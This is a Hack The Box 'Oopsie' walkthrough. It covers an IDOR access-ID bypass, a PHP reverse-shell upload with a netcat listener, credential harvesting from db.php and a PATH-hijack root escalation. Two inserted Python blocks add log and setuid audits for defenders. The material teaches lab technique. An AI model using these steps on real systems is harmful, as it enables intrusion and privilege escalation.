Oopsie has been Pwned!

Hack The Box Oopsie has been Pwned!

Hello again, it’s time for another Hack The Box adventure as we take on Oopsie.

Reconnaissance

As always, I started by spinning up the target host and connecting to the VPN. Once connected I ran an Nmap scan to see what services were available.

sudo nmap -sC -sV -O -p0- 10.10.10.28
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

The Nmap scan showed that only port 22 (Secure Shell) and port 80 (HTTP) were open. As there wasn’t much point trying to hack the SSH login via brute force (and as it isn’t a preferred method of exploiting a box) I started by browsing the website. The website was fairly basic and at first glance didn’t offer much.

[Image: MegaCorp Automotive Website]

There are many tools to crawl/spider a website, such as dirb and gobuster, but on this occasion I used Burp Suite. Burp Suite is a web application security analysis (hacking) tool. I turned off intercept and loaded the website in the built-in Burp Browser (Chromium).

[Image: Burp Suite Browser]

Burp has a built-in spidering/crawling tool that will search through the contents of the web page. The application appeared to have a login page at the following URL.

http://10.10.10.28/cdn-cgi/login.php

Crawling the rest of the website didn’t appear to reveal any other sensitive directories or information. There was a login page but no credentials. We could have tried to hack the login page using a brute force attack with Intruder, but first let’s try the credentials we found on the previous box, Archetype.

BINGO, the MEGACORP_4dm1n!! password from the Archetype box history worked. The first thing I noticed when logged in was that there was an upload page. Unfortunately it’s never that simple. Visiting the upload page returned an error that I needed to be super admin. Looking around the site a bit more revealed some interesting information on the Repair Management System page.

[Image: MegaCorp Automotive Repair Management System]

The admin user appeared to have an “access ID”. I wanted to investigate this “access ID” further, so I captured the request using Burp intercept and noticed that when viewing the account page there was an $id parameter.

[Image: Burp Request Captured]

I sent this request to Burp Intruder and cleared the payload positions. Once they were cleared I added a payload position on the value 1 of the $id parameter. I then used seq on Linux to generate a payload list.

seq 1 100
1
2
3
snipped
98
99
100

I then copied and pasted the results into the payload section of Intruder. There was one final option to configure before moving forward. In the options tab there is a setting to follow redirections and to process cookies in redirections. Both of those needed to be ticked in order to launch the hack properly.

[Image: Redirection Options]

Once the settings were in place, I launched the hack. One tip for Intruder attacks is to sort the results by the response length. Most of the time you will find that the response length is the same; however, if there is something interesting then the length of that response will likely be different. BINGO, the 30th request contained the information I needed. It looks like the super admin id was 30 and the Access ID was 86575.

[Image: Super Admin Intercepted]

I then turned intercept back on and made a request to the upload page. Burp Suite intercepted the request and allowed me to edit it before it was sent to the server. I modified the Access ID value to that of the super admin and forwarded the request. The request was accepted by the server and I was allowed to access the upload page.

Foothold Hack

I used this PHP reverse shell script and modified it with my IP address and desired port. Next I needed to upload it to the website, making sure to modify the Access ID value to the super admin Access ID when submitting the payload. I then set up my netcat listener.

sudo nc -lvp 1234

Once the listener was running it was time to find out where the script had been uploaded to. As I said previously, there are many tools to do this, including dirbuster and gobuster, but in this instance Burp had already found the uploads directory. Using cURL I called the PHP script to trigger the reverse shell connection back to my machine. You could also visit the script directly in your browser to trigger it.

curl http://10.10.10.28/uploads/phpshell.php
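As an added example that is not part of the original writeup, here is a small Python detector run over constructed Apache access-log lines, showing what the two steps above look like from the server side: the Intruder run walking sequential id values, and a .php file requested from /uploads/ right after a POST to the upload page. The exact admin.php query layout and the upload page path are assumptions; the log lines are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit
# Apache common log format: host ident user [time] "method url proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+')

def parse_log(text):
    """One dict per well-formed line (ip, ts, method, path, query); junk lines are skipped."""
    out = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        url = urlsplit(rec["url"])
        rec["path"], rec["query"] = url.path, {k: v[0] for k, v in parse_qs(url.query).items()}
        out.append(rec)
    return out

def find_id_enumeration(records, min_ids=20, window=timedelta(seconds=60)):
    """Clients hitting >= min_ids distinct id values inside `window` (the trace seq 1 100 leaves)."""
    probes, hits = {}, []                           # ip -> [(ts, id)]
    for r in records:
        if "id" in r["query"]:
            probes.setdefault(r["ip"], []).append((r["ts"], r["query"]["id"]))
    for ip, events in probes.items():
        events.sort()
        for i, (start, _) in enumerate(events):    # slide the window over that client's probes
            ids = {v for t, v in events[i:] if t - start <= window}
            if len(ids) >= min_ids:
                hits.append((ip, len(ids)))
                break
    return hits

def find_upload_then_execute(records, upload_page="/cdn-cgi/login/admin.php"):
    """POST to the (assumed) upload page, then a .php fetched from /uploads/ by the same client."""
    posted, hits = set(), []
    for r in records:                               # records are in log order
        if r["method"] == "POST" and r["path"] == upload_page:
            posted.add(r["ip"])
        elif r["ip"] in posted and r["path"].startswith("/uploads/") and r["path"].endswith(".php"):
            hits.append((r["ip"], r["path"]))
    return hits

def _line(ip, sec, method, url, status=200):        # one constructed log line
    return f'{ip} - - [01/Mar/2024:10:00:{sec:02d} +0000] "{method} {url} HTTP/1.1" {status} 1134'
# Constructed sample: 25 sequential id probes, an upload, then the uploaded script is called.
SAMPLE_LOG = "\n".join([_line("10.10.14.2", s, "GET", f"/cdn-cgi/login/admin.php?content=accounts&id={s + 1}")
                        for s in range(25)] + [
    _line("10.10.14.2", 40, "POST", "/cdn-cgi/login/admin.php?content=uploads", 302),
    _line("10.10.14.2", 41, "GET", "/uploads/phpshell.php")])
```

Feed `parse_log(open("/var/log/apache2/access.log").read())` to both detectors to run it over a real log; the thresholds are deliberately conservative and can be tuned per site.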

I checked the history and didn’t find anything useful, so I then listed the contents of the home directory and found the user robert. I was able to read the contents of robert’s home directory, including the user.txt flag.

$ whoami
www-data
$ ls home
robert
$ ls home/robert
user.txt
$ cat /home/robert/user.txt
f2cXXXXXXXXXXXXXXXXXXXX981

After getting the user.txt file I decided to poke around on the server a bit more. I thought it best to check the web directory to see if there was anything I missed. As it turns out there was a db.php file which contained a username and password.

$ ls /var/www/html/cdn-cgi/login
admin.php db.php index.php script.js
$ cat /var/www/html/cdn-cgi/login/db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

Privilege Escalation Hack

This appeared to be the password for the robert user so I decided to switch to the robert user and see what he had permission to run by using the id command.

robert@oopsie:/$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

robert was a member of a group called bugtracker, which pointed to an interesting binary of the same name. This was likely going to be the method of privilege escalation, so I decided to check it out. Using the tool strings on the bugtracker file, it became evident that there was a clear path to privilege escalation.

robert@oopsie:/$ strings /usr/bin/bugtracker
/lib64/ld-linux-x86-64.so.2
SNIP
------------------
: EV Bug Tracker :
------------------
Provide Bug ID:
------------------
cat /root/reports/

The binary was calling the cat tool without its full path, so cat is looked up through the PATH environment variable at run time. This meant we could prepend a directory we control to PATH and place our own cat there; when the binary runs, it executes whatever we put inside our newly created cat file instead of the real one. In this instance we created a new cat file in /tmp that, when run, would spawn a shell.

export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

Then, when we run /usr/bin/bugtracker, we are dropped into a root shell where we can capture the root.txt file.

/usr/bin/bugtracker
cat /root/root.txt
af13b0bee69f8a877c3faf667f7beacf
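As an added example that is not part of the writeup, here is a small Python audit script for the defender's side of this finding: it walks a directory for setuid-root binaries and flags embedded strings that invoke a command by bare name (as `cat /root/reports/` does), which is exactly what makes the PATH trick above work. The command word list and the sample byte blob standing in for the binary are constructed.

```python
import os
import re
import stat

PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")          # same minimum length `strings` uses by default
# A bare command word at the start means PATH lookup at run time ("/bin/cat ..." would not). Constructed list.
COMMAND_WORDS = {"cat", "ls", "cp", "mv", "rm", "sh", "bash", "tar", "find", "grep",
                 "awk", "sed", "chmod", "chown", "ps", "kill", "service", "systemctl"}
BARE_CMD_RE = re.compile(r"^([a-z][a-z0-9_.+-]*)(?:\s+\S.*)?$")

def extract_strings(data):
    """Printable ASCII runs of four or more bytes, like `strings` would print."""
    return [m.group().decode("ascii") for m in PRINTABLE_RE.finditer(data)]

def flag_relative_commands(data):
    """Strings in a binary image that look like a command invoked by name via PATH."""
    hits = []
    for s in extract_strings(data):
        m = BARE_CMD_RE.match(s.strip())
        if m and m.group(1) in COMMAND_WORDS:
            hits.append(s.strip())
    return hits

def is_setuid_root(path):
    st = os.lstat(path)                                 # lstat: do not follow symlinks
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0

def audit_tree(root="/usr/bin"):
    """Map each setuid-root binary under `root` to the PATH-dependent command strings it contains."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if not is_setuid_root(path):
                    continue
                with open(path, "rb") as f:
                    hits = flag_relative_commands(f.read())
            except OSError:                             # unreadable or vanished file: skip it
                continue
            if hits:
                findings[path] = hits
    return findings

# Constructed stand-in for an ELF image carrying the same strings the writeup saw in bugtracker.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 +
                 b"/lib64/ld-linux-x86-64.so.2\x00: EV Bug Tracker :\x00Provide Bug ID:\x00"
                 b"cat /root/reports/\x00/bin/ls -l /var/log\x00setuid\x00")
if __name__ == "__main__":
    print(flag_relative_commands(SAMPLE_BINARY), audit_tree())   # ['cat /root/reports/'] then real findings
```

Anything `audit_tree()` reports should be rebuilt to call commands by absolute path (or, better, without spawning a shell at all) and to reset PATH before doing anything as root.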
[Image: Oopsie has been Pwned!]